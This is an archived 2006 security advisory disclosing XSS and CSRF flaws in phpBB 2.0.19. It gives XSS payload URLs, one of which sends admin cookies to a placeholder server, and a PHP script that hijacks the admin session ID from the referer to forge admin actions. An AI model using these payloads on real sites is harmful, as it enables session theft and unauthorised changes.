phpBB2.0.19.txt

`Orginal Source: http://securityreason.com/achievement_securityalert/31  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]  
  
Author: Maksymilian Arciemowicz (cXIb8O3)  
Date: 3.2.2006  
from SecurityReason.Com  
CVE-2006-0437 for the XSS issues  
CVE-2006-0438 for the CSRF issues  
  
  
- --- 0.Description ---  
phpBB is a high powered, fully scalable, and highly customizable Open Source   
bulletin board package. phpBB has a  
  
user-friendly interface, simple and straightforward administration panel, and   
helpful FAQ. Based on the powerful PHP  
  
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC   
database servers, phpBB is the ideal  
  
free community solution for all web sites.  
Contact with author http://www.phpbb.com/about.php.  
  
- --- 1. XSS admin ---  
In admin/admin_smilies.php you can create, modifcate smille. So nothing   
special but phpBB don't check what is going to db.  
  
case savenew  
  
- -448-473---  
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ?   
$HTTP_POST_VARS['smile_code'] :  
  
$HTTP_GET_VARS['smile_code'];  
$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ?   
$HTTP_POST_VARS['smile_url'] :  
  
$HTTP_GET_VARS['smile_url'];  
$smile_url = phpbb_ltrim(basename($smile_url), "'");  
$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?  
  
$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];  
$smile_code = trim($smile_code);  
$smile_url = trim($smile_url);  
$smile_emotion = trim($smile_emotion);  
  
// If no code was entered complain ...  
if ($smile_code == '' || $smile_url == '')  
{  
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);  
}  
  
//  
// Convert < and > to proper htmlentities for parsing.  
//  
$smile_code = str_replace('<', '<', $smile_code);  
$smile_code = str_replace('>', '>', $smile_code);  
  
//  
// Save the data to the smiley table.  
//  
$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)  
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .   
str_replace("\'", "''",  
  
$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";  
$result = $db->sql_query($sql);  
- -448-473---  
  
Only "<" and ">" are restricted.  
  
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c"   
onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN  
  
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrgreen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN  
  
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN  
  
and you have new smile. Ofcourse you can better do exploit. For IE and etc.  
  
  
- --- 2. Cross Site Request Forgeries ---  
phpBB admin in Administration Panel have SID in url. Ok. Example if you want   
see user profil or split, lock someone  
  
post etc.  
  
Like:  
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0  
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35  
etc.  
  
If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you   
can create url to script with referer for admin.So when admin open profil the   
url will be executed. Need be referer in request.  
  
Next problem is:  
  
103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|  
png))$)#is", $avatar_filename) )  
  
in includes/unsercp_avatar.php.  
  
Why? Because this preg() don't have limit of chars.  
In mysql phpbb DB you have (*_users)  
  
user_avatar varchar(100)  
  
only 100 chars will go to db.  
So you can post url like  
  
http://[HOST]/[DIR]/script.php/[100 chars].jpg  
  
Sent:  
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg  
  
and in db is:  
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur  
  
or in bbcode (IMG)  
  
http://[HOST]/[DIR]/script.php/securityreason.jpg  
  
Nothing special.. Ok..  
  
You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one   
script. Doesn't need be in serverwhere is phpbb.  
  
- -script.php--  
<?php  
# SecurityReason.Com writed by Maksymilian Arciemowicz  
# Example exploit  
  
$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';   
#   
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=icon_mrgreen.gif"   
onmouseover='alert(document.cookie)'  
  
$sid='';  
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);  
  
if($sid[1]!=''){  
header("Location: ".$operation."&sid=".$sid[1]);  
}  
  
?>  
- -script.php--  
  
In this script you need give someone operation. I think, can be:  
  
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20  
create new smilie.. and all char a, change to image with javascript (XSS).  
  
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63  
Delete someone smile.  
  
http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124b7ced0668dec5900fed3b35  
Delete word censor.  
  
http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4  
Change position of forum=4.  
  
http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4  
Delete Rank Administration  
  
http://[HOST]/[DIR]/login.php?logout=true  
Logout  
  
etc..  
  
If admin have in url SID and img tag is displaying that this script can get   
SID form HTTP_REFERER and redirect tooperation for admin   
(header("Location...")).  
Admin can't see result. This XSS in Point 1 can you used for this trick.  
  
Solution is don't displaying <IMG> tags from user where have you SID in url.   
And use POST to any operations like create, remove smilies etc.  
  
- --- 3. Greets ---  
sp3x  
  
- --- 4. Contact ---  
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
SecurityReason.Com  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (FreeBSD)  
  
iD8DBQFD41JC3Ke13X/fTO4RAhpsAJ46jnHCF0c9RROYPC1T88N9D/iOigCgwKUV  
3YyVMR1NFsznOmjVpv6LVAc=  
=b2mM  
-----END PGP SIGNATURE-----  
`